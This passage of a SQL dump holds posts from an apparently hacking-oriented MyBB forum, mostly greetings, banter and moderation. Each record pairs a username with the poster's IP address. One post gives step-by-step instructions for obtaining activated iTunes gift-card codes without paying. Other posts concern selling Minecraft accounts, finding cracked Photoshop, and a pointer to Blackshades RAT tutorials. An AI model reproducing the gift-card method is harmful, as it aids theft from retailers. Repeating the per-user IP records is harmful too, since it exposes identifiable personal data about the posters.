Ryan. Thanks for joining and hope you enjoy your stay.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '22866dac7ba47bd6b401f18f2966bdc3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6873', '1176', '6870', '47', 'RE: Free .asia domain', '0', '228', 'VirtualLegend', '1351792835', 'Nice Share, Hope you will stay active I brought you specially back bro :P', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '7315d1253148af4a70de339aadf946b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6874', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '222', 'Exposé', '1351794172', 'what was your site Sin? And welcome back!', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '85a7b0a08416f73c8afec0d7e04698a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6875', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '82', 'iTzIpod', '1351798558', 'His site was elitelobby.com or something. I forgot. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eefacfa19627ff5c67ed21bcd88c919e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6876', '1175', '6869', '4', 'RE: Me:3', '0', '82', 'iTzIpod', '1351798618', 'Welcome to LH dude! Thanks VL for referring him. Enjoy your stay!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b1aa58d933a2ad9ea9f30391eef4403c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6877', '1175', '6869', '4', 'RE: Me:3', '0', '257', 'XxTREYZxX', '1351798790', 'Welcome mate enjoy your stay,be active and HQ', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '2a6c49ae0731db8e6ee70f4b77033519', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6878', '1155', '6738', '3', 'RE: Happy Halloween', '0', '257', 'XxTREYZxX', '1351798966', '/Request close thread,As if hollow is finished :L', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '17f2ad219bc8fe8d68c092dfdb0f16cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6879', '1158', '6852', '74', 'RE: A few minecraft accounts that might work', '0', '257', 'XxTREYZxX', '1351799137', '[quote=\'iTzIpod\' pid=\'6852\' dateline=\'1351769606\'] Capital I.. Etc. :/ Commas. ._. [/quote] Sorry i missed those one\'s.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', 'eff34c24733171d6e0c8bed68aa0f425', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6880', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '257', 'XxTREYZxX', '1351799351', 'That\'s not to bad. Have you earn\'t much selling these accounts.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '6b77758b109cef0f71f10dd5a25118ce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6881', '1174', '6866', '47', 'RE: ?? Untraceable PayPal + Never Get Limited Again + PP Secret ??', '0', '257', 'XxTREYZxX', '1351799504', 'Thank You very much VL,Very much appreciated', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '53ce3e6c4564a23d4edd61c43c02c2da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6882', '861', '6842', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1351799692', '[quote=\'Triple H\' pid=\'6842\' dateline=\'1351750798\'] I reached 100 posts finally :D [/quote] Great Work Mate You Should get your cheers on 100 Award. [hr] [quote=\'iTzIpod\' pid=\'6857\' dateline=\'1351769826\'] Congratulations on 100 posts. I reached 1400 posts today! [/quote] Great Work Ipod, Your doing great :O', '203.104.11.13', '-882373875', '1', '0', '257', '1351799856', '1', '4bef540430aa4d7dea550f43a649e2ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6883', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '257', 'XxTREYZxX', '1351800181', 'This is Awesome, I now have a sic as BG', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', 'e7257e7f53da4f97e019173b9a322219', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6884', '1155', '6738', '3', 'RE: Happy Halloween', '0', '82', 'iTzIpod', '1351802435', 'Agreed with Trey. /Request Close Thread Since Halloween is finished. Happy November 1st.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e61d807b114bf489b4e8f20c554031d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6885', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '228', 'VirtualLegend', '1351802458', 'Just browse one at piratebay', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '36be4ad95c90b8806dfe5659fcdbad3a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6886', '1158', '6745', '74', 'RE: A few minecraft accounts that might work', '0', '82', 'iTzIpod', '1351802487', 'The fuck is \'one\'s\'? + didn\'t I just state capital I? And you just said \'i\' -.- I\'m going to kill you one day..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b72e4320fcc522059949345b2ec56f01', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6887', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '228', 'VirtualLegend', '1351802528', 'lol it isn\'t that great don\'t you think', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '733c16efb40ffae8663d2e5198f8f88e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6888', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '82', 'iTzIpod', '1351802580', 'K. You need to Google \'How to write with proper grammar\' -.- I didn\'t understand a word you just said.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a100e7fe1f3f27922a76833d6a2c6d23', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6889', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1351802615', 'Thanks Trey. And \'you\'re\' not \'your\'.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4b87e6de94bcd9c8005fb7834f2ce8ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6890', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '82', 'iTzIpod', '1351802655', 'You\'re welcome! :) Glad to help.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1360cb3d74e1253933248717a87637d0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6891', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '62', 'R?????zo?', '1351807202', 'I remember you, welcome back.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'cc2e1f569f77faf4681ba09c173d5c5e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6892', '1175', '6869', '4', 'RE: Me:3', '0', '62', 'R?????zo?', '1351807246', 'welcome, enjoy your stay and be active', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '32db6763f87b94255aade9953dd2618d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6893', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '61', 'NXK', '1351808701', 'Welcome back, Haven\'t seen you in awhile. Hope you\'re still going to be HQ.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'f5a3faa53da5e6b5c9a6ecfcacd2d9bf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6894', '1154', '6734', '43', 'RE: Iphone 5 serials', '0', '61', 'NXK', '1351808927', 'Oh damn, This is nice aha! Great share.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '1959ae94930dd078a67db9462c230762', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6896', '1155', '6738', '3', 'RE: Happy Halloween', '0', '1', 't3h jok3r', '1351823062', 'Thread Closed!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2b8f112d3b4ca1db87ede014411581d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6897', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '1', 't3h jok3r', '1351823114', 'About to watch the perfect storm movie from 2000.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '36bf573964a091788a7118f5662eac63', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6898', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '2', 'Apathy', '1351823829', 'Welcome back. Did your site not work out?', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'f586cbb587a7b744f7e9316f95e3ba6f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6899', '1176', '6870', '47', 'RE: Free .asia domain', '0', '2', 'Apathy', '1351823873', 'Already seen this but nice share anyway. Thanks.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '5bcedb8d9347c8481244e5e0fbab27f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6900', '1175', '6869', '4', 'RE: Me:3', '0', '2', 'Apathy', '1351823926', 'Hey, thanks for checking out our forum. Have a nice stay and be active.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'e219bd7b8fd89c1b198cc410a4af8be0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6901', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '2', 'Apathy', '1351824006', 'Does not look too hard to make But I like it. Thanks.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'a8eff06297620c6fbd4e7992ea8e0806', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6902', '1176', '6870', '47', 'RE: Free .asia domain', '0', '205', 'mothered', '1351828725', 'I shall check this out after this post. Thanks mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'df654255f440635b314bcfabb96c09c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6903', '1105', '6427', '24', 'RE: Windows 8 Officially released 26-10', '0', '205', 'mothered', '1351828953', 'In terms of navigating your way around, Windows 8 Is much of a muchness to Windows 7. You\'ll get used to It, In no time at all.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5450ce36fbeabf3ff2bca9f45b81fbe8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6904', '305', '6863', '84', 'RE: Themejunkies.net theme rip', '0', '1', 't3h jok3r', '1351833099', '[quote=\'VirtualLegend\' pid=\'6863\' dateline=\'1351776556\'] @t3h Jok3r F*king nice theme we need also a theme like this [/quote] D@rthforums.net, forumleague and 1 more site use the same kind of theme.', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', 'eff34692bf6c792ed1f5d66f2c5cb00f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6905', '1177', '0', '43', 'Free itunes/app store gift cards crack', '0', '5', 'Timmy', '1351835023', 'I think im the first one to find this if not then at least not the slowest one to figure out. [b]Requirements[/b] [list] [*] A app store gift card (any amount) [*] Paper & Pen/pencil or phone with notepad or something similar. [/list] [b]Step 1[/b] Pick up any card and detach the card from the holder. [b]Step 2[/b] Scratch the grey thing completely and leave no grey stuff. [b]Step 3[/b] Write down the code you got after scratching the line [b]Step 4[/b] Attach the card back to the holder and go to any teller. [b]Step 5[/b] After she scans it say you forgot your wallet etc and you will be back in a sec. Go away and don\'t come back. [b]Conclusion [/b] Use the code to get some money on your itunes account. That\'s it you now have $$$ on your account for free. [b]How does this work?[/b] There\'s no barcode that they scan on the gift card they type in a code on the card. After they type in it\'s auto active so after they scan it you pay for it and basically after they scan it it\'s active so the hidden code which you need to scratch is active before you pay and after they scan. So you don\'t need to pay for it as it\'s already active and non-used. Jok3r will be verifying this tomorrow by going into a store.', '173.245.64.95', '-1376436129', '1', '0', '5', '1351835042', '1', 'b00bbd5520814b652b5be20b18251497', '0', '1351835042'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6906', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '5', 'Timmy', '1351835198', 'If you find one OP then please PM me.', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', 'b91a1aacf334e00b667608e7f515e617', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6907', '1172', '6844', '83', 'RE: [tut]How to knock someone out[/video]', '0', '5', 'Timmy', '1351835242', '[quote=\'XxTREYZxX\' pid=\'6844\' dateline=\'1351751906\'] How come i cant watch this,it\'s just a white pic :O [/quote] It works for me. Maybe it\'s just you.', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', '7e45b587d3685e9a6a6efff85f219885', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6908', '1169', '6836', '3', 'RE: Computing Tab Forum Suggestions', '0', '5', 'Timmy', '1351835432', 'Maybe a customizing your PC section.', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', '46f9eab8416c3ba77e203c93ea6bd1b4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6909', '937', '5258', '19', '[Junk]Nude Bot- Mr. Do you want to fap?', '0', '1', 't3h jok3r', '1351835566', 'This thread has been junked.', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6910', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '4', 'Triple H', '1351836612', 'Ok @ timmy i dont want torrent @ virtual', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', '89e499c70ef5f35e57ec2e691e7c5366', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6911', '1172', '6843', '83', 'RE: [tut]How to knock someone out[/video]', '0', '257', 'XxTREYZxX', '1351846011', 'Have you got any suggestions why?', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '080c1971eb35f17285b3b6c60b2df2c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6912', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '257', 'XxTREYZxX', '1351846146', 'I trying to say how much have you made selling mc accounts', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', '112e98cc4ecf91f6bd8a946b6a1540a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6913', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '82', 'iTzIpod', '1351853146', 'Well, I sold about 7 or 8 so far. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dc2044c2a39f4d20de31d6ea77bf81e0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6914', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '257', 'XxTREYZxX', '1351853664', 'So about 24 dollars earn\'t.', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'c72c29a26a1ec398f89b4612d1a2db83', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6915', '1178', '0', '35', 'My new Siggy', '0', '257', 'XxTREYZxX', '1351853769', 'Hey guys how many of you guys and ladies like my siggy', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '9503a5a75aee69809583e3d33b75b324', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6916', '1178', '6915', '35', 'RE: My new Siggy', '0', '61', 'NXK', '1351857481', 'Wrong section, This belongs in the graphics lounge. Ill move it for you now :).', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '040adf0b054bf1dbdcc025a85b3b2870', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6917', '1178', '6915', '35', 'RE: My new Siggy', '0', '257', 'XxTREYZxX', '1351867559', 'Oh thank you NXK for doing that.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '69a45b3d7863846d4690c924cc68e80a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6918', '1172', '6843', '83', 'RE: [tut]How to knock someone out[/video]', '0', '53', 'sirchamp', '1351869162', 'The Video is banned in my country ...', '114.184.4.171', '1924662443', '1', '0', '0', '0', '1', '273e1e499314648869c61be0f8ba45de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6919', '1164', '6811', '11', 'RE: RAT Help', '0', '53', 'sirchamp', '1351875738', 'It\'s actually pretty easy... There are lots of tutorials on the web.lmgtfy.com/?q=blackshades+rat+tutorial', '84.131.58.175', '1417886383', '1', '0', '0', '0', '1', '3d6e23615874923df38b447aa442fb9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6920', '1179', '0', '4', 'LSD is here', '0', '313', 'LSD', '1351876624', 'Hey my name is LSD, I heard about this forum when I was on LeakForums and then one of my friends on Nodus reminded me of it so I registered. Hopefully this place is cool. Gonna be checking things out. :cool:', '69.125.203.115', '1165871987', '0', '0', '0', '0', '1', '4e20e238226cb907f19a15f701683d5c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6921', '1179', '6920', '4', 'RE: LSD is here', '0', '257', 'XxTREYZxX', '1351876940', 'hey LCD whats happening,hope you stay active and HQ if you have any problems feel free to pm me or the admin and staff', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '208ecf424f391bba0d49c4beac504b1c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6922', '1173', '6846', '5', 'RE: Request for LH staff', '0', '61', 'NXK', '1351882367', 'Ill check it out, I don\'t normally use any kind of tool bars since they slow down your browser, But ill give it a try.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '991c29709af7fe5fb69394fb0efc8d22', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6923', '1172', '6843', '83', 'RE: [tut]How to knock someone out[/video]', '0', '61', 'NXK', '1351882432', 'I guess.. this is a good guide if you need to fight someone hahah.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '00d0b637c0eb8a7735bbd02a3ffce12d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6924', '1177', '6905', '43', 'RE: Free itunes/app store gift cards crack', '0', '82', 'iTzIpod', '1351884147', 'Quite nice. :P Smart way to get your own code.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 